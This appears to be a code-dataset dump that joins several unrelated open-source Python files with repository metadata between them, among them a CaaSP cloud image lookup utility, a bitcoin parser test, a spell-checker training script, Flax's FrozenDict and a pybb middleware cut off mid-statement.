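se, lower, auc, upper = calc_auc_conf_interval(0.8, 50, 50)
print(round(se, 4), round(lower, 3), auc, round(upper, 3))
# 0.0445 0.713 0.8 0.887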
4c656802f3785c807e752895a2d07dd94b79c82b
4,377
py
Python
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
5
2017-03-16T10:47:39.000Z
2018-01-17T13:07:03.000Z
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
138
2017-03-08T12:43:51.000Z
2019-04-15T12:57:30.000Z
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
26
2017-03-09T08:24:03.000Z
2019-03-08T00:26:52.000Z
import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys

RELEASE_DATE = re.compile(r'^.*-v(\d{8})-*.*')


def get_caasp_release_version():
    """Return the version from os-release"""
    os_release = open('/etc/os-release', 'r').readlines()
    for entry in os_release:
        if entry.startswith('VERSION_ID'):
            version_id = entry.split('=')[-1].strip()
            # We assume that os-release will always have '"' as
            # version delimiters
            version = version_id.strip('"\'')
            logging.info('Release version: "%s"' % version)
            return version


def get_cloud_config_path():
    """Return the path for the cloud configuration file"""
    return '/etc/salt/pillar/cloud.sls'


def get_from_config(config_option):
    """Get the value for the given config option"""
    # Expected low usage of this method, re-read the file on an as needed
    # basis. If this turns out to be an issue cache the content
    config_path = get_cloud_config_path()
    with open(config_path) as config_file:
        config = yaml.load(config_file.read())

    settings = config.get('cloud')
    if not settings:
        return

    return settings.get(config_option)


def get_cluster_image_identifier(framework, region):
    """Return the identifier for the latest cluster node image"""
    cluster_image = get_from_config('cluster_image')
    if cluster_image:
        # The data returned in this code path has built in knowledge
        # about the information consumed by the client from the
        # full pint data
        image_data = {}
        image_data['id'] = cluster_image
        image_data['name'] = cluster_image
        if framework == 'microsoft' and cluster_image.count(':') == 3:
            image_data['urn'] = cluster_image
        msg = 'Using cluster image from configuration. '
        msg += 'Image data for cluster node image: "%s"'
        logging.info(msg % image_data)
        return image_data

    name_filter = 'name~caasp,name~cluster'
    flavor = get_from_config('procurement_flavor')
    if flavor == 'byos':
        name_filter += ',name~byos'
    else:
        name_filter += ',name!byos'

    version = get_caasp_release_version()
    name_filter += ',name~' + version.replace('.', '-')

    # The cluster image we choose depends on the admin node version,
    # thus we cannot just query for active images. We need to get all
    # images and then process accordingly.
    try:
        image_info = ifsrequest.get_image_data(
            framework,
            None,
            'json',
            region,
            name_filter
        )
    except Exception as e:
        logging.error('Pint server access failed: "%s"' % e)
        # This message will bubble up through salt
        return 'See /var/log/caasp_cloud_setup.log'

    try:
        image_data = json.loads(image_info)
        available_images = image_data.get('images', [])
        target_image = None
        target_image_date = 0
        for image in available_images:
            image_name = image.get('name')
            try:
                date = int(RELEASE_DATE.match(image_name).group(1))
                if date > target_image_date:
                    # If we have multiple images with the same date that
                    # match our filter criteria we have a serious data problem
                    # we cannot really recover, the first one wins
                    target_image = image
                    target_image_date = date
            except Exception:
                # Image name with no date stamp, skip it
                continue
    except Exception as e:
        logging.error('Could not load json data from pint: "%s"' % e)
        # This message will bubble up through salt
        return 'See /var/log/caasp_cloud_setup.log'

    if not target_image:
        logging.error('Could not determine image identifier for cluster node.')
        logging.error('This implies that the pint server is unreachable or the '
                      'data is incomplete, please report the issue, exiting.')
        sys.exit('pint lookup failed')

    logging.info('Image data for cluster node image: "%s"' % target_image)
    return target_image


def load_platform_module(platform_name):
    mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
    return mod
37.732759
80
0.631026
0
0
0
0
0
0
0
0
1,729
0.395019
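An illustration of the RELEASE_DATE pattern defined at the top of the file above: it pulls the 8-digit datestamp out of versioned image names (the names below are hypothetical):

import re

RELEASE_DATE = re.compile(r'^.*-v(\d{8})-*.*')
for name in ('caasp-cluster-byos-v20190410-image', 'caasp-admin-setup-v20181201'):
    m = RELEASE_DATE.match(name)
    print(name, '->', m.group(1) if m else 'no datestamp')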
4c66a4345821de6dcbba5bb0bbb633c3ee79daa3
2,219
py
Python
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.

import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block


class TestBlock(unittest.TestCase):
    def test_from_hex(self):
        block_hex = read_test_data("genesis_block.txt")
        block = Block.from_hex(block_hex)
        self.assertEqual(1, block.n_transactions)
        block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
                     "b60a8ce26f"
        self.assertEqual(block_hash, block.hash)
        self.assertEqual(486604799, block.header.bits)
        merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
                      "b7afdeda33b"
        self.assertEqual(merkle_root, block.header.merkle_root)
        self.assertEqual(2083236893, block.header.nonce)
        self.assertEqual(1, block.header.version)
        self.assertEqual(1, block.header.difficulty)
        self.assertEqual(285, block.size)
        self.assertEqual(datetime.utcfromtimestamp(1231006505),
                         block.header.timestamp)
        self.assertEqual("0" * 64, block.header.previous_block_hash)

        for tx in block.transactions:
            self.assertEqual(1, tx.version)
            tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
                      "b7afdeda33b"
            self.assertEqual(tx_hash, tx.hash)
            self.assertEqual(204, tx.size)
            self.assertEqual(0, tx.locktime)
            self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
            self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
            self.assertTrue("ffff001d" in tx.inputs[0].script.value)
            self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
            self.assertEqual(50 * 100000000, tx.outputs[0].value)
43.509804
79
0.68995
1,677
0.755746
0
0
0
0
0
0
644
0.290221
4c66dd7c5bb758efe86e3099648aa0be4405bfa6
75
py
Python
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
'''
DNA++ (c) DNA++ 2017

All rights reserved.

@author: neilswainston
'''
9.375
22
0.626667
0
0
0
0
0
0
0
0
74
0.986667
4c69488448856c1dbc829f26d69379083cb5c7c7
600
py
Python
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
import os

import pandas as pd
import pytest

from user_similarity_model.config.core import DATASET_DIR, config


@pytest.fixture()
def sample_local_data():
    """Load the sample CSV files that ship in the dataset folder.

    Returns:
        Dict: maps each CSV file name (without its extension) to a DataFrame.
        In the tests, this data is compared against data pulled from the
        Azure PostgreSQL server.
    """
    sample_data = {}
    for file in config.app_config.csv_files:
        sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file))
    return sample_data
27.272727
78
0.716667
0
0
0
0
485
0.808333
0
0
270
0.45
4c6a6e28161a83ca0b9ef2212d453c1bc1cfcfd6
232
py
Python
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
1
2020-12-05T05:23:26.000Z
2020-12-05T05:23:26.000Z
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
null
null
null
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
null
null
null
from django.apps import AppConfig
import logging

logger = logging.getLogger(__name__)


class WeatherConfig(AppConfig):
    name = 'weather'

    def ready(self):
        from forecastUpdater import updater
        updater.start()
17.846154
43
0.715517
142
0.612069
0
0
0
0
0
0
9
0.038793
4c6a77a19021a586afe308be8abcbb50f2c090fd
26
py
Python
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
25
2021-10-30T19:54:59.000Z
2022-03-29T06:11:02.000Z
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
21
2021-10-19T01:09:38.000Z
2022-03-24T16:08:53.000Z
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
3
2022-01-25T20:25:13.000Z
2022-03-08T02:58:50.000Z
import filer
import tests
8.666667
12
0.846154
0
0
0
0
0
0
0
0
0
0
4c6c5b767e3d2e7d380bed49701614a213de873b
8,063
py
Python
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
""" ============ Pass Network ============ This example shows how to plot passes between players in a set formation. """ import pandas as pd from mplsoccer.pitch import Pitch from matplotlib.colors import to_rgba import numpy as np from mplsoccer.statsbomb import read_event, EVENT_SLUG ############################################################################## # Set team and match info, and get event and tactics dataframes for the defined match_id match_id = 15946 team = 'Barcelona' opponent = 'Alavés (A), 2018/19 La Liga' event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False) players = event_dict['tactics_lineup'] events = event_dict['event'] ############################################################################## # Adding on the last tactics id and formation for the team for each event events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[ events.tactics_formation.notnull(), 'id'] events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[ 'tactics_id', 'tactics_formation']].ffill() ############################################################################## # Add the abbreviated player position to the players dataframe formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB', 8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM', 14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM', 20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'} players['position_abbreviation'] = players.player_position_id.map(formation_dict) ############################################################################## # Add on the subsitutions to the players dataframe, i.e. where players are subbed on # but the formation doesn't change sub = events.loc[events.type_name == 'Substitution', ['tactics_id', 'player_id', 'substitution_replacement_id', 'substitution_replacement_name']] players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'), on=['id', 'player_id'], how='inner', validate='1:1') players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']] .rename({'substitution_replacement_id': 'player_id'}, axis='columns')) players = pd.concat([players, players_sub]) players.rename({'id': 'tactics_id'}, axis='columns', inplace=True) players = players[['tactics_id', 'player_id', 'position_abbreviation']] ############################################################################## # Add player position information to the events dataframe # add on the position the player was playing in the formation to the events dataframe events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1') # add on the position the receipient was playing in the formation to the events dataframe events = events.merge(players.rename({'player_id': 'pass_recipient_id'}, axis='columns'), on=['tactics_id', 'pass_recipient_id'], how='left', validate='m:1', suffixes=['', '_receipt']) ############################################################################## # Create dataframes for passes and player locations # get a dataframe with all passes mask_pass = (events.team_name == team) & (events.type_name == 'Pass') to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id', 'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation', 'position_abbreviation', 'position_abbreviation_receipt'] passes = events.loc[mask_pass, to_keep].copy() print('Formations used by {} in match: '.format(team), 
passes['tactics_formation'].unique()) ############################################################################## # Filter passes by chosen formation, then group all passes and receipts to # calculate avg x, avg y, count of events for each slot in the formation formation = 433 passes_formation = passes[(passes.tactics_formation == formation) & (passes.position_abbreviation_receipt.notnull())].copy() passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy() recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy() # rename columns to match those in passer_passes recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation', 'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True) # create a new dataframe containing all individual passes and receipts from passes_formation appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True) average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({ 'x': ['mean'], 'y': ['mean', 'count']}) average_locs_and_count.columns = ['x', 'y', 'count'] ############################################################################## # Group the passes by unique pairings of players and add the avg player positions to this dataframe # calculate the number of passes between each position (using min/ max so we get passes both ways) passes_formation['pos_max'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].max(axis='columns') passes_formation['pos_min'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].min(axis='columns') passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index() passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True) # add on the location of each player so we have the start and end positions of the lines passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True) passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True, suffixes=['', '_end']) ############################################################################## # Calculate the line width and marker sizes relative to the largest counts max_line_width = 18 max_marker_size = 3000 passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width average_locs_and_count['marker_size'] = (average_locs_and_count['count'] / average_locs_and_count['count'].max() * max_marker_size) ############################################################################## # Set color to make the lines more transparent when fewer passes are made min_transparency = 0.3 color = np.array(to_rgba('white')) color = np.tile(color, (len(passes_between), 1)) c_transparency = passes_between.pass_count / passes_between.pass_count.max() c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency color[:, 3] = c_transparency ############################################################################## # Plotting pitch = Pitch(pitch_type='statsbomb', orientation='horizontal', pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11), constrained_layout=True, tight_layout=False) fig, ax = pitch.draw() pass_lines = pitch.lines(passes_between.x, passes_between.y, passes_between.x_end, passes_between.y_end, lw=passes_between.width, color=color, zorder=1, ax=ax) pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, 
s=average_locs_and_count.marker_size, color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax) for index, row in average_locs_and_count.iterrows(): pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax) title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc') fig.set_facecolor("#22312b")
55.226027
116
0.615032
0
0
0
0
0
0
0
0
3,987
0.49442
4c6cd0ca287f397e656cbb934079a5d03bb867b9
2,786
py
Python
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
__all__ = ['Factory']


import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator

import getdirs
import getfiles
import os
import popd
import yaml


@popd.popd
def _build(path):
    os.chdir(path)
    jsfiddle_build.Build().save("build.html")


@popd.popd
def _init(path):
    os.chdir(path)
    isempty = len(os.listdir(path)) == 0
    isfiddle = len(
        list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
    if isempty or isfiddle:
        jsfiddle_generator.JSFiddleRepo().create()


@popd.popd
def _readme(path):
    os.chdir(path)
    jsfiddle_readme_generator.Readme().save("README.md")


class Factory:
    """attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
    path = None

    def __init__(self, path=None):
        if not path:
            path = os.getcwd()
        self.path = path

    def build_html(self):
        files = getfiles.getfiles(self.path)
        matches = ["demo.html", "fiddle.html"]
        for f in filter(lambda f: os.path.basename(f) in matches, files):
            _build(os.path.dirname(f))

    def create_readme(self):
        files = getfiles.getfiles(self.path)
        matches = ["demo.html", "fiddle.html"]
        for f in filter(lambda f: os.path.basename(f) in matches, files):
            _readme(os.path.dirname(f))

    def init(self):
        for path in getdirs.getdirs(self.path):
            _init(path)

    def detox(self):
        renamed = True
        while renamed:
            renamed = False
            for path in getdirs.getdirs(self.path):
                relpath = os.path.relpath(path, os.getcwd())
                new_relpath = jsfiddle_github.sanitize(relpath)
                new_path = os.path.join(os.getcwd(), new_relpath)
                ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
                if not ishidden and new_relpath != relpath:
                    os.rename(path, new_path)
                    print("%s -> %s" % (path, new_path))
                    renamed = True
                    break

    def update_resources(self):
        f = os.path.join(self.path, "resources.txt")
        if not os.path.exists(f):
            print("SKIP: %s NOT EXISTS" % f)
            return  # nothing to sync without resources.txt
        resources = list(filter(None, open(f).read().splitlines()))
        files = getfiles.getfiles(self.path)
        matches = ["demo.details", "fiddle.manifest"]
        for f in filter(lambda f: os.path.basename(f) in matches, files):
            if os.path.exists(f):
                data = yaml.load(open(f, 'r'))
                if data.get("resources", []) != resources:
                    data["resources"] = resources
                    yaml.dump(data, open(f, 'w'), default_flow_style=False)
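For illustration, a minimal usage sketch of the Factory class above (not part of the original file; the working directory is assumed to be a checkout of fiddle folders):

from jsfiddle_factory import Factory

factory = Factory()          # defaults to os.getcwd()
factory.detox()              # sanitize directory names via jsfiddle_github.sanitize
factory.init()               # scaffold empty folders into fiddles
factory.build_html()         # render build.html next to each demo.html/fiddle.html
factory.update_resources()   # sync resources.txt into demo.details/fiddle.manifest
factory.create_readme()      # regenerate README.md for each fiddle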
30.955556
98
0.578248
2,117
0.759871
0
0
464
0.166547
0
0
317
0.113783
4c6d7d5083c40236ec67c12d5db46eb9b81e4185
5,774
py
Python
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union

import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model

from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'  # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)


class Gym:
    def __init__(self):
        self.train_dataset: Optional[tf.data.Dataset] = None
        self.valid_dataset: Optional[tf.data.Dataset] = None
        self.char2int: Optional[CharMapping] = None
        self.model: Optional[Model] = None
        self.nb_train_samples: int = 0
        self.nb_valid_samples: int = 0
        self.batch_size = 0

    def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
        pprint(locals())
        all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
        char_weights = [0.5 if c.isalpha() and c.islower()
                        else 0.2 if c.isalpha()
                        else 0.1 if c not in {alphabet.START, alphabet.END}
                        else 0
                        for c in all_chars]
        self.char2int = CharMapping(chars=all_chars, include_unknown=True)
        data_processor = DataProcessor(locale=locale, char2id=self.char2int,
                                       alphabet=all_chars, alphabet_weighs=char_weights)

        print('Calculating number of lines in the file...', end=' ')
        all_samples = nb_lines(path)
        print(all_samples)

        self.batch_size = batch_size
        self.nb_train_samples = int((1 - validation_split) * all_samples)
        self.nb_valid_samples = all_samples - self.nb_train_samples

        dataset = tf.data.TextLineDataset(path)
        self.train_dataset = dataset.take(self.nb_train_samples)
        self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
        self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
        self.train_dataset = self.train_dataset.map(
            lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b],
                                        Tout=['int32', 'int32', 'int32']))
        self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
        self.train_dataset = self.train_dataset.repeat()

        self.valid_dataset = dataset.skip(self.nb_train_samples)
        self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
        self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
        self.valid_dataset = self.valid_dataset.map(
            lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b],
                                        Tout=['int32', 'int32', 'int32']))
        self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
        self.valid_dataset = self.valid_dataset.repeat()
        return self

    def create_model(self, name):
        arguments = signature(getattr(models, name).__init__)
        arguments = {k: v.default for k, v in arguments.parameters.items()
                     if v.default is not Parameter.empty and k != 'self'}
        arguments['nb_symbols'] = len(self.char2int)
        arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
                             for k, v in arguments.items()])
        # print(arg_str)
        exec(dedent(f'''
        def create({arg_str}):
            self.model = {name}(**locals())
            return self
        create.__name__ = {name}.__name__
        create.__doc__ = {name}.__init__.__doc__
        setattr(self, create.__name__, create)
        '''), {'self': self, name: getattr(models, name), arg_str: arg_str})
        return getattr(self, name)

    def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
              steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
              log_dir: str = 'logs', use_multiprocessing: bool = False):
        pprint(locals())
        log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
        model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
        model_path = str(model_path)
        if steps_per_epoch == 'auto':
            steps_per_epoch = self.nb_train_samples // self.batch_size
        if validation_steps == 'auto':
            validation_steps = self.nb_valid_samples // self.batch_size

        self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
        history = self.model.fit_generator(
            self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
            validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
            epochs=epochs,
            use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
            callbacks=[
                TerminateOnNaN(),
                TensorBoard(log_dir=log_dir),
                ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
                EarlyStopping(monitor=monitor_metric, patience=patience),
            ])
        return history.history


if __name__ == '__main__':
    cli = Gym()
    fire.Fire(cli)
46.943089
118
0.662799
4,977
0.861967
0
0
0
0
0
0
573
0.099238
4c6e61959c8414eed50a9b983937c8b1f9cf4b26
3,711
py
Python
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Frozen Dictionary."""

from typing import TypeVar, Mapping, Dict, Tuple

from flax import serialization
import jax


K = TypeVar('K')
V = TypeVar('V')


@jax.tree_util.register_pytree_node_class
class FrozenDict(Mapping[K, V]):
  """An immutable variant of the Python dict."""
  __slots__ = ('_dict', '_hash')

  def __init__(self, *args, **kwargs):
    self._dict = dict(*args, **kwargs)
    self._hash = None

  def __getitem__(self, key):
    v = self._dict[key]
    if isinstance(v, dict):
      return FrozenDict(v)
    return v

  def __setitem__(self, key, value):
    raise ValueError('FrozenDict is immutable.')

  def __contains__(self, key):
    return key in self._dict

  def __iter__(self):
    return iter(self._dict)

  def __len__(self):
    return len(self._dict)

  def __repr__(self):
    return 'FrozenDict(%r)' % self._dict

  def __hash__(self):
    if self._hash is None:
      h = 0
      for key, value in self.items():
        h ^= hash((key, value))
      self._hash = h
    return self._hash

  def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]':
    """Create a new FrozenDict with additional or replaced entries."""
    return type(self)(self, **unfreeze(add_or_replace))

  def items(self):
    for key in self._dict:
      yield (key, self[key])

  def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]:
    """Create a new FrozenDict where one entry is removed.

    Example::

      state, params = variables.pop('params')

    Args:
      key: the key to remove from the dict
    Returns:
      A pair with the new FrozenDict and the removed value.
    """
    value = self[key]
    new_dict = dict(self._dict)
    new_dict.pop(key)
    new_self = type(self)(new_dict)
    return new_self, value

  def unfreeze(self) -> Dict[K, V]:
    return unfreeze(self)

  def tree_flatten(self):
    return (self._dict,), ()

  @classmethod
  def tree_unflatten(cls, _, data):
    return cls(*data)


def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]:
  """Freeze a nested dict.

  Makes a nested `dict` immutable by transforming it into `FrozenDict`.
  """
  # Turn the nested FrozenDict into a dict. This way the internal data structure
  # of FrozenDict does not contain any FrozenDicts.
  # instead we create those lazily in `__getitem__`.
  # As a result tree_flatten/unflatten will be fast
  # because it operates on native dicts.
  xs = unfreeze(xs)
  return FrozenDict(xs)


def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]:
  """Unfreeze a FrozenDict.

  Makes a mutable copy of a `FrozenDict` mutable by transforming
  it into (nested) dict.
  """
  if not isinstance(x, (FrozenDict, dict)):
    return x
  ys = {}
  for key, value in x.items():
    ys[key] = unfreeze(value)
  return ys


def _frozen_dict_state_dict(xs):
  return {key: serialization.to_state_dict(value) for key, value in xs.items()}


def _restore_frozen_dict(xs, states):
  return freeze(
      {key: serialization.from_state_dict(value, states[key])
       for key, value in xs.items()})


serialization.register_serialization_state(
    FrozenDict, _frozen_dict_state_dict, _restore_frozen_dict)
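For illustration, a minimal usage sketch of the FrozenDict API above (not part of the original file):

params = freeze({'dense': {'kernel': [1.0, 2.0], 'bias': [0.0]}})
kernel = params['dense']['kernel']                   # nested dicts come back as FrozenDict views
updated = params.copy(add_or_replace={'extra': 1})   # new FrozenDict; the original is untouched
rest, dense = updated.pop('dense')                   # (FrozenDict without the key, removed value)
plain = unfreeze(updated)                            # back to a plain nested dict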
25.770833
80
0.68041
1,746
0.470493
72
0.019402
1,788
0.481811
0
0
1,542
0.415521
4c72d8c0b48b4984dfd1c6e64ae6bd05f864f9ea
1,273
py
Python
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
# -*- coding: utf-8 -*-

from django.utils import translation
from django.db.models import ObjectDoesNotExist

from pybb import util
from pybb.signals import user_saved


class PybbMiddleware(object):
    def process_request(self, request):
        if request.user.is_authenticated():
            try:
                # Here we try to load profile, but can get error
                # if user created during syncdb but profile model
                # under south control. (Like pybb.Profile).
                profile = util.get_pybb_profile(request.user)
            except ObjectDoesNotExist:
                # Ok, we should create new profile for this user
                # and grant permissions for add posts
                user_saved(request.user, created=True)
                profile = util.get_pybb_profile(request.user)

            language = translation.get_language_from_request(request)

            if not profile.language:
                profile.language = language
                profile.save()

            if profile.language and profile.language != language:
